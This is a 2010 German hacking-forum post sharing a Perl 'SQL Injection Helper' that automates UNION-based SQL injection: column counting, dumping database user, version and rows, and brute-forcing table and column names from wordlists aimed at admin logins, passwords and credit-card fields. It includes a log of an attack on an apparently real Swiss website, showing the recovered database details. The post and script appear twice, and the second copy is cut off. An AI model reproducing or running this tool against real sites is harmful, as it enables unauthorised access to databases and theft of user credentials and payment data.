fred777
13.06.2010, 15:16
Ich stelle euch hier ein schon etwas älteres Projekt von mir zur Verfügung. Da verschiedene SQL Injection Helper bei mir nicht besonders liefen, ganz abgesehen von Linux, habe ich mir selbst was dazu geschrieben.
Etwas besonderes ist es nicht, einfach nur hilfreich und nicht so abgefuckt wie schemafuzz :D
Funktionen sind in den Comments zu betrachten.
Bubi ist geschrieben in Perl
Zeilen gesamt -> ähm 310
Auf Wunsch bastel ich noch Proxy- und Threadunterstützung rein ;)
Logfiles werden automatisch generiert und sollten alle wichtigen Informationen enthalten. Für Kritik und Codeverbesserungen bin ich offen :)
Intro
#!/usr/bin/perl
#-------------------------------------------------------------------#
# _ ___ _ ____
# (_)/ _ \| | |___ \
# _| | | | | __ __) |
# | | | | | |/ /|__ <
# | | |_| | < ___) |
# | |\___/|_|\_\____/
# _/ |
# |__/ SQL Injection Helper 1.0
#
#................................................. ...............
#
# + written by fred777
# + (C) 2010 by j0k3 project
# + fred777.5x.to
#
# .................................................. .............
# DAMN INFORMATION SHIT
#
# + Column Counter
# + SQL Data Grabber
# + Name Information Fuzzer
#
# - Column Counter
# - $ perl sql.pl -c <page> <true-word>
# - $ perl sql.pl -c http://seite.de/?d=1 j0k3
#
# - SQL Data Grabber
# - $ perl sql.pl -d <page>
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,
# j0k3(table_name1,name2)+from+table
#
# - Name Information Fuzzer
# - $ perl sql.pl -f <page>
# - $ perl sqlp.pl -f http://seite.de/?d=-1+union+select+1,j0k3
#
# .................................................. .............
# DAMN GREETZ
#
# + back2hack, free-hack, creative-coding, scene-coderz, hackbase
# + darkc0de for the n1 table list
# + and teh leet happy ninjas of course :P
#
#-------------------------------------------------------------------#
Logfile - Example:
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Columns:8
String: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7 ,8--+
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Url: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7 ,j0k3
User: leeger_zuckerm@localhost
MySQL Version: 5.0.90-community
Directory: /var/lib/mysql/
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Url: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7 ,UNHEX(HEX(CONCAT_WS(0x3a,99999,table_name,column_ name,99999)))+from+information_schema.columns
Dumping Information:
[0] CHARACTER_SETS:CHARACTER_SET_NAME
[1] CHARACTER_SETS:DEFAULT_COLLATE_NAME
[2] CHARACTER_SETS:DESCRIPTION
[3] CHARACTER_SETS:MAXLEN
[4] COLLATIONS:COLLATION_NAME
[5] COLLATIONS:CHARACTER_SET_NAME
[6] COLLATIONS:ID
[7] COLLATIONS:IS_DEFAULT
[8] COLLATIONS:IS_COMPILED
[9] COLLATIONS:SORTLEN
[10] COLLATION_CHARACTER_SET_APPLICABILITY:COLLATION_NA ME
[11] COLLATION_CHARACTER_SET_APPLICABILITY:CHARACTER_SE T_NAME
[12] COLUMNS:TABLE_CATALOG
[13] COLUMNS:TABLE_SCHEMA
[14] COLUMNS:TABLE_NAME
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Url: http://zuckermais.ch/index.php?id=18+and+1=0+union+select+1,2,3,4,5,6,7 ,j0k3
Scanning Tables:
+ information_schema.columns -> Scanning Columns:
- table_name
- column_name
Script:
#!/usr/bin/perl
#-------------------------------------------------------------------#
# _ ___ _ ____
# (_)/ _ \| | |___ \
# _| | | | | __ __) |
# | | | | | |/ /|__ <
# | | |_| | < ___) |
# | |\___/|_|\_\____/
# _/ |
# |__/ SQL Injection Helper 1.0
#
#................................................. ...............
#
# + written by fred777
# + (C) 2010 by j0k3 project
# + fred777.5x.to
#
# .................................................. .............
# DAMN INFORMATION SHIT
#
# + Column Counter
# + SQL Data Grabber
# + Name Information Fuzzer
#
# - Column Counter
# - $ perl sql.pl -c <page> <true-word>
# - $ perl sql.pl -c http://seite.de/?d=1 j0k3
#
# - SQL Data Grabber
# - $ perl sql.pl -d <page>
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,
# j0k3(table_name1,name2)+from+table
#
# - Name Information Fuzzer
# - $ perl sql.pl -f <page>
# - $ perl sqlp.pl -f http://seite.de/?d=-1+union+select+1,j0k3
#
# .................................................. .............
# DAMN GREETZ
#
# + back2hack, free-hack, creative-coding, scene-coderz, hackbase
# + darkc0de for the n1 table list
# + and teh leet happy ninjas of course :P
#
#-------------------------------------------------------------------#
use strict;
use warnings;
use LWP::UserAgent;
print q
{
+-------------------------------------------------------------+
| SQL Injection Helper 1.0 |
| |
| + Column Counter |
| + SQL Data Grabber |
| + Name Information-Fuzzer |
| |
| < j0k3 > (C) by fred777 |
+-------------------------------------------------------------+
}; $|++;
our ($op,$url,$true) = @ARGV;
our ($file,$lim) = ('log.txt',1000);
our $ua = LWP::UserAgent->new();
my $head =
"+-------------------------------------------------------------+\n".
"| j0k3 SQL Injection Helper - Logfile |\n".
"+-------------------------------------------------------------+\n";
usage() unless $op =~ m:^-d$|^-c$|^-f$:i;
usage() unless $url =~ m.^http://.;
writing($head);
order() if($op eq '-c');
selects() if($op eq '-d');
fuzz() if($op eq '-f');
sub order {
error() if(!$true);
my ($resp,$i,$str) = (0,0,"$url+AND+1=0+UNION+SELECT+1");
do {
$i++;
$resp = $ua->get("$url+ORDER+BY+$i--+") or die "\n$!\n";
} while($resp->content =~ m:$true:i);
$str .= ",$_" for (2..$i-1);
printf("\nColumns: %d\nString: %s\n",$i-1,"$str--+");
writing("\nColumns:".($i-1)."\nString: $str--+\n\n");
}
sub selects {
if($url =~ m:.+j0k3: && $url !~ m:.+from.+:) {
my $inf = 'UNHEX(HEX(CONCAT_WS(0x3a,99999,user(),version(),@ @datadir,99999)))';
my $st = replace($url,'j0k3',$inf);
my $resp = $ua->get("$st--+") or die "\n$!\n";
$resp->content =~ m![9]{5}:(.+):(.+):(.+):[9]{5}!i;
my $t = "\nUrl: $url\n\nUser: $1\nMySQL Version: $2\nDirectory: $3\n\n";
print $t; writing($t);
}
elsif($url =~ m:.+from.+:i) {
my ($c,$resp) = (0,0);
$url =~ m:j0k3\((.+)\):i;
my $str = "UNHEX(HEX(CONCAT_WS(0x3a,99999,$1,99999)))";
my $st = replace($url,'j0k3\('.$1.'\)',$str);
print "\nDumping Information:\n\n"; writing("\nUrl: $st\n\nDumping Information:\n\n");
do {
$resp = $ua->get("$st+LIMIT+$c,$lim--+") or die "\n$!\n";
$resp->content =~ m![9]{5}:(.*):[9]{5}!;
print "[$c] $1\n"; writing("[$c] $1\n");
$c++;
} while($resp->content =~ m![9]{5}:(.+):[9]{5}! && $resp->content !~ m:error:i);
}
else {
error();
}
}
sub fuzz {
my @tables =(
'user','admin','users','admins','account','account s','adm','admin_login',
'member','memberlist','members','login_admin','log in_admins','login_user',
'login_users','logins','logon','logs','admin_user' ,'admin_userinfo','administer',
'administrable','administrate','administration','a dministrator','administrators',
'adminrights','adminuser','login','mambo_session', 'mambo_users','manage','Logins',
'manager','mb_users','mybb_users','e107.e107_user' ,'e107_user','Admins','Login',
'phorum_users','phpads_clients','phpads_config','p hpbb_users','phpBB2.forum_users',
'tbladmins','sort','_wfspro_admin','4images_users' ,'a_admin','art','article_admin',
'articles','artikel','aut','author','autore','back end','backend_users','backenduser',
'chat_config','chat_messages','chat_users','client ','clients','clubconfig',
'company','config','contact','contacts','content', 'control','cpg_config',
'cpg132_users','customer','customers','customers_b asket','dbadmins','dealer',
'dealers','diary','download','forum.ibf_members',' fusion_user_groups',
'fusion_users','group','groups','ibf_admin_session s','ibf_conf_settings',
'ibf_members','ibf_members_converge','ibf_sessions ','icq','images','index',
'info','ipb.ibf_members','ipb_sessions','joomla_us ers','jos_blastchatc_users',
'jos_comprofiler_members','jos_contact_details','j os_joomblog_users',
'jos_messages_cfg','jos_moschat_users','jos_users' ,'knews_lostpass','korisnici',
'kpro_adminlogs','kpro_user','links','lost_pass',' lost_passwords','movie','movies',
'lostpass','lostpasswords','m_admin','main','minib btable_users','mitglieder',
'mysql','mysql.user','name','names','news','news_l ostpass','newsletter',
'nuke_authors','nuke_bbconfig','nuke_config','nuke _popsettings','nuke_users',
'obb_profiles','order','orders','parol','partner', 'partners','passes','password',
'passwords','perdorues','perdoruesit','phorum_sess ion','phorum_user',
'phpBB2.phpbb_users','phpmyadmin.pma_table_info',' pma_table_info','poll_user',
'punbb_users','pwd','pwds','reg_user','reg_users', 'registered','reguser','regusers',
'session','sessions','settings','shop.cards','shop .orders','site_login',
'site_logins','sitelogin','sitelogins','sites','sm allnuke_members','smf_members',
'SS_orders','statistics','superuser','sysadmin','s ysadmins','system','sysuser',
'sysusers','table','tables','tb_admin','tb_adminis trator','tb_login','tb_member',
'tb_members','tb_user','tb_username','tb_usernames ','tb_users','tbl','tbl_user',
'tbl_users','tbluser','tbl_clients','tbl_client',' tblclients','tblclient','test',
'usebb_members','user_admin','user_info','user_lis t','user_login','user_logins',
'user_names','usercontrol','userinfo','userlist',' userlogins','username','usernames',
'userrights','users','vb_user','vbulletin_session' ,'vbulletin_user','voodoo_members',
'webadmin','webadmins','webmaster','webmasters','w ebuser','webusers','x_admin',
'xoops_bannerclient','xoops_users','yabb_settings' ,'yabbse_settings','ActiveDataFeed',
'Category','CategoryGroup','ChicksPass','ClickTrac k','Country','CountryCodes1',
'DataFeedShowtag1','DataFeedShowtag2','DataFeedSho wtag2_incoming','dtproperties',
'Event','Event_backup','Event_Category','EventRedi rect','Events_new','Genre',
'JamPass','MyTicketek','MyTicketekArchive','News', 'Promotion','Region',
'SearchOptions','Series','Sheldonshows','StateList ','States','SubCategory',
'Subjects','Survey','SurveyAnswer','SurveyAnswerOp en','SurveyQuestion','SurveyRespondent',
'sysconstraints','syssegments','tblRestrictedPassw ords','tblRestrictedShows',
'Ticket System Acc Numbers','TimeDiff','Titles','Total Members','UserPreferences',
'uvw_Category','uvw_Preferences','Venue','venues', 'VenuesNew','stone list',
'tblArtistCategory','tblArtists','tblConfigs','tbl Layouts','tblLogBookAuthor',
'tblLogBookImages','tblLogBookImport','tblLogBookU ser','tblMails','tblNewCategory',
'tblNews','tblOrders','tblStoneCategory','tblStone s','tblUser','tblWishList',
'viewLogBookEntry','viewStoneArtist','vwListAllAva ilable','CC_info',
'CC_username','cms_user','cms_users','cms_admin',' cms_admins','user_name',
'jos_user','table_user','email','mail','bulletin', 'cc_info','login_name',
'admuserinfo','userlistuser_list','SiteLogin','Sit e_Login','UserAdmin',
);
my @columns = (
'user','name','username','password','passwd','pass ','benutzername','passwort',
'cc_number','id','email','pwd','user_name','custom ers_email_address',
'customers_password','user_password','user_pass',' admin_user','admin_password',
'admin_pass','usern','user_n','username1','passwor d1','email1','id1',
'users','login','logins','login_user','login_admin ','login_username','user_username',
'user_login','auid','apwd','adminid','admin_id','a dminuser','adminuserid',
'admin_userid','adminusername','admin_username','a dminname','admin_name',
'usr','usr_n','usrname','usr_name','usrpass','usr_ pass','usrnam','nc','uid',
'userid','user_id','myusername','mail','emni','log ohu','punonjes','kpro_user',
'wp_users','emniplote','perdoruesi','perdorimi','p unetoret','logini','llogaria',
'kodi','emer','ime','korisnik','korisnici','user1' ,'administrator','text',
'administrator_name','mem_login','login_password', 'login_pass','login_passwd',
'login_pwd','sifra','lozinka','psw','pass1word','p ass_word','passw','pass_w',
'user_passwd','userpass','userpassword','userpwd', 'user_pwd','useradmin',
'user_admin','mypassword','passwrd','admin_pwd','a dmin_passwd','mem_password',
'memlogin','e_mail','usrn','u_name','uname','mempa ssword','mem_pass',
'mem_passwd','mem_pwd','p_word','pword','p_assword ','myname','my_username',
'my_name','my_password','my_email','cvvnumber','ab out','access','accnt',
'accnts','account','accounts','admin','adminemail' ,'adminlogin','adminmail',
'admins','aid','aim','auth','authenticate','authen tication','blog','cc_expires',
'cc_owner','cc_type','cfg','cid','clientname','cli entpassword','clientusername',
'conf','config','contact','converge_pass_hash','co nverge_pass_salt','crack',
'customer','customers','cvvnumber]','data','db_database_name','db_hostname',
'db_password','db_username','download','e-mail','emailaddress','full','gid',
'group','group_name','hash','hashsalt','homepage', 'icq','icq_number','id_group',
'id_member','images','index','ip_address','last_ip ','last_login','lastname',
'log','login_name','login_pw','loginkey','loginout ','logo','md5hash','member',
'member_id','member_login_key','member_name','memb erid','membername','members',
'new','news','nick','number','nummer','pass_hash', 'passwordsalt','passwort',
'personal_key','phone','privacy','pw','pwrd','salt ','search','secretanswer',
'secretquestion','serial','session_member_id','ses sion_member_login_key','sesskey',
'setting','sid','spacer','status','store','store1' ,'store2','store3','store4',
'table_prefix','temp_pass','temp_password','temppa ss','temppasword','text','un',
'user_email','user_icq','user_ip','user_level','us er_passw','user_pw','user_pword',
'user_pwrd','user_un','user_uname','user_usernm',' user_usernun','user_usrnm',
'userip','userlogin','usernm','userpw','usr2','usr nm','usrs','warez','xar_name',
'xar_pass');
print "\nUrl: $url\n"; writing("\nUrl: $url\n");
print "\nScanning Tables:\n"; writing("\nScanning Tables:\n");
foreach my $tab (@tables) {
my $re = replace($url,'j0k3',9x5);
my $resp = $ua->get("$re+FROM+$tab--+");
if($resp->content =~ m:[^,][9]{5}: && $resp->content !~ m:error:i) {
print "+ $tab -> Scanning Columns:\n";
writing("+ $tab -> Scanning Columns:\n");
foreach my $col (@columns) {
$re = replace($url,'j0k3',"CONCAT(99999,0x3a,$col)");
$resp = $ua->get("$re+FROM+$tab+LIMIT+0,1--+");
if($resp->content =~ m:[^(][9]{5}: && $resp->content !~ m:error:i) {
print "- $col\n"; writing("- $col\n");
}
}
}
}
}
sub replace {
my ($str,$or,$re) = @_;
$str =~ s/$or/$re/;
return $str;
}
sub writing {
my $text = shift;
open FL,">>$file" or die "\n$!\n";
print FL $text;
close FL;
}
sub error {
print "+-------------------------------------------------------------+\n".
"| Error: Read Usage! - \$ perl sql.pl |\n".
"+-------------------------------------------------------------+\n"; exit;
}
sub usage {
print q {
+-------------------------------------------------------------+
| INFORMATION |
+-------------------------------------------------------------+
| |
| Column Counter: |
| $ perl sql.pl -c <url> <true-word> |
| $ perl sql.pl -c http://seite.de/?id=7 j0k3 |
| |
| SQL Data Grabber: |
| $ perl sql.pl -d <url> |
| $ perl sql.pl -d http://seite.de/?id=-7+union+select |
| +1,j0k3 |
| $ perl sql.pl -d http://seite.de/?id=-7+union+select+1, |
| j0ke(column1,column2)+from+table |
| |
| Name Information Fuzzer: |
| $perl sql.pl -f <url> |
| $perl sql.pl -f http://seite.de/?id=-7+union+select |
| +1,j0k3 |
| |
| < j0k3 > |
+-------------------------------------------------------------+
}; exit;
}
# EOF - < j0k3 > - > 06.2010 - version 1.0
Etwas besonderes ist es nicht, einfach nur hilfreich und nicht so abgefuckt wie schemafuzz :D
Funktionen sind in den Comments zu betrachten.
Bubi ist geschrieben in Perl
Zeilen gesamt -> ähm 310
Auf Wunsch bastel ich noch Proxy- und Threadunterstützung rein ;)
Logfiles werden automatisch generiert und sollten alle wichtigen Informationen enthalten. Für Kritik und Codeverbesserungen bin ich offen :)
Intro
#!/usr/bin/perl
#-------------------------------------------------------------------#
# _ ___ _ ____
# (_)/ _ \| | |___ \
# _| | | | | __ __) |
# | | | | | |/ /|__ <
# | | |_| | < ___) |
# | |\___/|_|\_\____/
# _/ |
# |__/ SQL Injection Helper 1.0
#
#................................................. ...............
#
# + written by fred777
# + (C) 2010 by j0k3 project
# + fred777.5x.to
#
# .................................................. .............
# DAMN INFORMATION SHIT
#
# + Column Counter
# + SQL Data Grabber
# + Name Information Fuzzer
#
# - Column Counter
# - $ perl sql.pl -c <page> <true-word>
# - $ perl sql.pl -c http://seite.de/?d=1 j0k3
#
# - SQL Data Grabber
# - $ perl sql.pl -d <page>
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,
# j0k3(table_name1,name2)+from+table
#
# - Name Information Fuzzer
# - $ perl sql.pl -f <page>
# - $ perl sqlp.pl -f http://seite.de/?d=-1+union+select+1,j0k3
#
# .................................................. .............
# DAMN GREETZ
#
# + back2hack, free-hack, creative-coding, scene-coderz, hackbase
# + darkc0de for the n1 table list
# + and teh leet happy ninjas of course :P
#
#-------------------------------------------------------------------#
Logfile - Example:
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Columns:8
String: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7 ,8--+
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Url: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7 ,j0k3
User: leeger_zuckerm@localhost
MySQL Version: 5.0.90-community
Directory: /var/lib/mysql/
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Url: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7 ,UNHEX(HEX(CONCAT_WS(0x3a,99999,table_name,column_ name,99999)))+from+information_schema.columns
Dumping Information:
[0] CHARACTER_SETS:CHARACTER_SET_NAME
[1] CHARACTER_SETS:DEFAULT_COLLATE_NAME
[2] CHARACTER_SETS:DESCRIPTION
[3] CHARACTER_SETS:MAXLEN
[4] COLLATIONS:COLLATION_NAME
[5] COLLATIONS:CHARACTER_SET_NAME
[6] COLLATIONS:ID
[7] COLLATIONS:IS_DEFAULT
[8] COLLATIONS:IS_COMPILED
[9] COLLATIONS:SORTLEN
[10] COLLATION_CHARACTER_SET_APPLICABILITY:COLLATION_NA ME
[11] COLLATION_CHARACTER_SET_APPLICABILITY:CHARACTER_SE T_NAME
[12] COLUMNS:TABLE_CATALOG
[13] COLUMNS:TABLE_SCHEMA
[14] COLUMNS:TABLE_NAME
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Url: http://zuckermais.ch/index.php?id=18+and+1=0+union+select+1,2,3,4,5,6,7 ,j0k3
Scanning Tables:
+ information_schema.columns -> Scanning Columns:
- table_name
- column_name
Script:
#!/usr/bin/perl
#-------------------------------------------------------------------#
# _ ___ _ ____
# (_)/ _ \| | |___ \
# _| | | | | __ __) |
# | | | | | |/ /|__ <
# | | |_| | < ___) |
# | |\___/|_|\_\____/
# _/ |
# |__/ SQL Injection Helper 1.0
#
#................................................. ...............
#
# + written by fred777
# + (C) 2010 by j0k3 project
# + fred777.5x.to
#
# .................................................. .............
# DAMN INFORMATION SHIT
#
# + Column Counter
# + SQL Data Grabber
# + Name Information Fuzzer
#
# - Column Counter
# - $ perl sql.pl -c <page> <true-word>
# - $ perl sql.pl -c http://seite.de/?d=1 j0k3
#
# - SQL Data Grabber
# - $ perl sql.pl -d <page>
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,
# j0k3(table_name1,name2)+from+table
#
# - Name Information Fuzzer
# - $ perl sql.pl -f <page>
# - $ perl sqlp.pl -f http://seite.de/?d=-1+union+select+1,j0k3
#
# .................................................. .............
# DAMN GREETZ
#
# + back2hack, free-hack, creative-coding, scene-coderz, hackbase
# + darkc0de for the n1 table list
# + and teh leet happy ninjas of course :P
#
#-------------------------------------------------------------------#
use strict;
use warnings;
use LWP::UserAgent;
print q
{
+-------------------------------------------------------------+
| SQL Injection Helper 1.0 |
| |
| + Column Counter |
| + SQL Data Grabber |
| + Name Information-Fuzzer |
| |
| < j0k3 > (C) by fred777 |
+-------------------------------------------------------------+
}; $|++;
our ($op,$url,$true) = @ARGV;
our ($file,$lim) = ('log.txt',1000);
our $ua = LWP::UserAgent->new();
my $head =
"+-------------------------------------------------------------+\n".
"| j0k3 SQL Injection Helper - Logfile |\n".
"+-------------------------------------------------------------+\n";
usage() unless $op =~ m:^-d$|^-c$|^-f$:i;
usage() unless $url =~ m.^http://.;
writing($head);
order() if($op eq '-c');
selects() if($op eq '-d');
fuzz() if($op eq '-f');
sub order {
error() if(!$true);
my ($resp,$i,$str) = (0,0,"$url+AND+1=0+UNION+SELECT+1");
do {
$i++;
$resp = $ua->get("$url+ORDER+BY+$i--+") or die "\n$!\n";
} while($resp->content =~ m:$true:i);
$str .= ",$_" for (2..$i-1);
printf("\nColumns: %d\nString: %s\n",$i-1,"$str--+");
writing("\nColumns:".($i-1)."\nString: $str--+\n\n");
}
sub selects {
if($url =~ m:.+j0k3: && $url !~ m:.+from.+:) {
my $inf = 'UNHEX(HEX(CONCAT_WS(0x3a,99999,user(),version(),@ @datadir,99999)))';
my $st = replace($url,'j0k3',$inf);
my $resp = $ua->get("$st--+") or die "\n$!\n";
$resp->content =~ m![9]{5}:(.+):(.+):(.+):[9]{5}!i;
my $t = "\nUrl: $url\n\nUser: $1\nMySQL Version: $2\nDirectory: $3\n\n";
print $t; writing($t);
}
elsif($url =~ m:.+from.+:i) {
my ($c,$resp) = (0,0);
$url =~ m:j0k3\((.+)\):i;
my $str = "UNHEX(HEX(CONCAT_WS(0x3a,99999,$1,99999)))";
my $st = replace($url,'j0k3\('.$1.'\)',$str);
print "\nDumping Information:\n\n"; writing("\nUrl: $st\n\nDumping Information:\n\n");
do {
$resp = $ua->get("$st+LIMIT+$c,$lim--+") or die "\n$!\n";
$resp->content =~ m![9]{5}:(.*):[9]{5}!;
print "[$c] $1\n"; writing("[$c] $1\n");
$c++;
} while($resp->content =~ m![9]{5}:(.+):[9]{5}! && $resp->content !~ m:error:i);
}
else {
error();
}
}
sub fuzz {
my @tables =(
'user','admin','users','admins','account','account s','adm','admin_login',
'member','memberlist','members','login_admin','log in_admins','login_user',
'login_users','logins','logon','logs','admin_user' ,'admin_userinfo','administer',
'administrable','administrate','administration','a dministrator','administrators',
'adminrights','adminuser','login','mambo_session', 'mambo_users','manage','Logins',
'manager','mb_users','mybb_users','e107.e107_user' ,'e107_user','Admins','Login',
'phorum_users','phpads_clients','phpads_config','p hpbb_users','phpBB2.forum_users',
'tbladmins','sort','_wfspro_admin','4images_users' ,'a_admin','art','article_admin',
'articles','artikel','aut','author','autore','back end','backend_users','backenduser',
'chat_config','chat_messages','chat_users','client ','clients','clubconfig',
'company','config','contact','contacts','content', 'control','cpg_config',
'cpg132_users','customer','customers','customers_b asket','dbadmins','dealer',
'dealers','diary','download','forum.ibf_members',' fusion_user_groups',
'fusion_users','group','groups','ibf_admin_session s','ibf_conf_settings',
'ibf_members','ibf_members_converge','ibf_sessions ','icq','images','index',
'info','ipb.ibf_members','ipb_sessions','joomla_us ers','jos_blastchatc_users',
'jos_comprofiler_members','jos_contact_details','j os_joomblog_users',
'jos_messages_cfg','jos_moschat_users','jos_users' ,'knews_lostpass','korisnici',
'kpro_adminlogs','kpro_user','links','lost_pass',' lost_passwords','movie','movies',
'lostpass','lostpasswords','m_admin','main','minib btable_users','mitglieder',
'mysql','mysql.user','name','names','news','news_l ostpass','newsletter',
'nuke_authors','nuke_bbconfig','nuke_config','nuke _popsettings','nuke_users',
'obb_profiles','order','orders','parol','partner', 'partners','passes','password',
'passwords','perdorues','perdoruesit','phorum_sess ion','phorum_user',
'phpBB2.phpbb_users','phpmyadmin.pma_table_info',' pma_table_info','poll_user',
'punbb_users','pwd','pwds','reg_user','reg_users', 'registered','reguser','regusers',
'session','sessions','settings','shop.cards','shop .orders','site_login',
'site_logins','sitelogin','sitelogins','sites','sm allnuke_members','smf_members',
'SS_orders','statistics','superuser','sysadmin','s ysadmins','system','sysuser',
'sysusers','table','tables','tb_admin','tb_adminis trator','tb_login','tb_member',
'tb_members','tb_user','tb_username','tb_usernames ','tb_users','tbl','tbl_user',
'tbl_users','tbluser','tbl_clients','tbl_client',' tblclients','tblclient','test',
'usebb_members','user_admin','user_info','user_lis t','user_login','user_logins',
'user_names','usercontrol','userinfo','userlist',' userlogins','username','usernames',
'userrights','users','vb_user','vbulletin_session' ,'vbulletin_user','voodoo_members',
'webadmin','webadmins','webmaster','webmasters','w ebuser','webusers','x_admin',
'xoops_bannerclient','xoops_users','yabb_settings' ,'yabbse_settings','ActiveDataFeed',
'Category','CategoryGroup','ChicksPass','ClickTrac k','Country','CountryCodes1',
'DataFeedShowtag1','DataFeedShowtag2','DataFeedSho wtag2_incoming','dtproperties',
'Event','Event_backup','Event_Category','EventRedi rect','Events_new','Genre',
'JamPass','MyTicketek','MyTicketekArchive','News', 'Promotion','Region',
'SearchOptions','Series','Sheldonshows','StateList ','States','SubCategory',
'Subjects','Survey','SurveyAnswer','SurveyAnswerOp en','SurveyQuestion','SurveyRespondent',
'sysconstraints','syssegments','tblRestrictedPassw ords','tblRestrictedShows',
'Ticket System Acc Numbers','TimeDiff','Titles','Total Members','UserPreferences',
'uvw_Category','uvw_Preferences','Venue','venues', 'VenuesNew','stone list',
'tblArtistCategory','tblArtists','tblConfigs','tbl Layouts','tblLogBookAuthor',
'tblLogBookImages','tblLogBookImport','tblLogBookU ser','tblMails','tblNewCategory',
'tblNews','tblOrders','tblStoneCategory','tblStone s','tblUser','tblWishList',
'viewLogBookEntry','viewStoneArtist','vwListAllAva ilable','CC_info',
'CC_username','cms_user','cms_users','cms_admin',' cms_admins','user_name',
'jos_user','table_user','email','mail','bulletin', 'cc_info','login_name',
'admuserinfo','userlistuser_list','SiteLogin','Sit e_Login','UserAdmin',
);
my @columns = (
'user','name','username','password','passwd','pass ','benutzername','passwort',
'cc_number','id','email','pwd','user_name','custom ers_email_address',
'customers_password','user_password','user_pass',' admin_user','admin_password',
'admin_pass','usern','user_n','username1','passwor d1','email1','id1',
'users','login','logins','login_user','login_admin ','login_username','user_username',
'user_login','auid','apwd','adminid','admin_id','a dminuser','adminuserid',
'admin_userid','adminusername','admin_username','a dminname','admin_name',
'usr','usr_n','usrname','usr_name','usrpass','usr_ pass','usrnam','nc','uid',
'userid','user_id','myusername','mail','emni','log ohu','punonjes','kpro_user',
'wp_users','emniplote','perdoruesi','perdorimi','p unetoret','logini','llogaria',
'kodi','emer','ime','korisnik','korisnici','user1' ,'administrator','text',
'administrator_name','mem_login','login_password', 'login_pass','login_passwd',
'login_pwd','sifra','lozinka','psw','pass1word','p ass_word','passw','pass_w',
'user_passwd','userpass','userpassword','userpwd', 'user_pwd','useradmin',
'user_admin','mypassword','passwrd','admin_pwd','a dmin_passwd','mem_password',
'memlogin','e_mail','usrn','u_name','uname','mempa ssword','mem_pass',
'mem_passwd','mem_pwd','p_word','pword','p_assword ','myname','my_username',
'my_name','my_password','my_email','cvvnumber','ab out','access','accnt',
'accnts','account','accounts','admin','adminemail' ,'adminlogin','adminmail',
'admins','aid','aim','auth','authenticate','authen tication','blog','cc_expires',
'cc_owner','cc_type','cfg','cid','clientname','cli entpassword','clientusername',
'conf','config','contact','converge_pass_hash','co nverge_pass_salt','crack',
'customer','customers','cvvnumber]','data','db_database_name','db_hostname',
'db_password','db_username','download','e-mail','emailaddress','full','gid',
'group','group_name','hash','hashsalt','homepage', 'icq','icq_number','id_group',
'id_member','images','index','ip_address','last_ip ','last_login','lastname',
'log','login_name','login_pw','loginkey','loginout ','logo','md5hash','member',
'member_id','member_login_key','member_name','memb erid','membername','members',
'new','news','nick','number','nummer','pass_hash', 'passwordsalt','passwort',
'personal_key','phone','privacy','pw','pwrd','salt ','search','secretanswer',
'secretquestion','serial','session_member_id','ses sion_member_login_key','sesskey',
'setting','sid','spacer','status','store','store1' ,'store2','store3','store4',
'table_prefix','temp_pass','temp_password','temppa ss','temppasword','text','un',
'user_email','user_icq','user_ip','user_level','us er_passw','user_pw','user_pword',
'user_pwrd','user_un','user_uname','user_usernm',' user_usernun','user_usrnm',
'userip','userlogin','usernm','userpw','usr2','usr nm','usrs','warez','xar_name',
'xar_pass');
print "\nUrl: $url\n"; writing("\nUrl: $url\n");
print "\nScanning Tables:\n"; writing("\nScanning Tables:\n");
foreach my $tab (@tables) {
my $re = replace($url,'j0k3',9x5);
my $resp = $ua->get("$re+FROM+$tab--+");
if($resp->content =~ m:[^,][9]{5}: && $resp->content !~ m:error:i) {
print "+ $tab -> Scanning Columns:\n";
writing("+ $tab -> Scanning Columns:\n");
foreach my $col (@columns) {
$re = replace($url,'j0k3',"CONCAT(99999,0x3a,$col)");
$resp = $ua->get("$re+FROM+$tab+LIMIT+0,1--+");
if($resp->content =~ m:[^(][9]{5}: && $resp->content !~ m:error:i) {
print "- $col\n"; writing("- $col\n");
}
}
}
}
}
sub replace {
my ($str,$or,$re) = @_;
$str =~ s/$or/$re/;
return $str;
}
sub writing {
my $text = shift;
open FL,">>$file" or die "\n$!\n";
print FL $text;
close FL;
}
sub error {
print "+-------------------------------------------------------------+\n".
"| Error: Read Usage! - \$ perl sql.pl |\n".
"+-------------------------------------------------------------+\n"; exit;
}
sub usage {
print q {
+-------------------------------------------------------------+
| INFORMATION |
+-------------------------------------------------------------+
| |
| Column Counter: |
| $ perl sql.pl -c <url> <true-word> |
| $ perl sql.pl -c http://seite.de/?id=7 j0k3 |
| |
| SQL Data Grabber: |
| $ perl sql.pl -d <url> |
| $ perl sql.pl -d http://seite.de/?id=-7+union+select |
| +1,j0k3 |
| $ perl sql.pl -d http://seite.de/?id=-7+union+select+1, |
| j0ke(column1,column2)+from+table |
| |
| Name Information Fuzzer: |
| $perl sql.pl -f <url> |
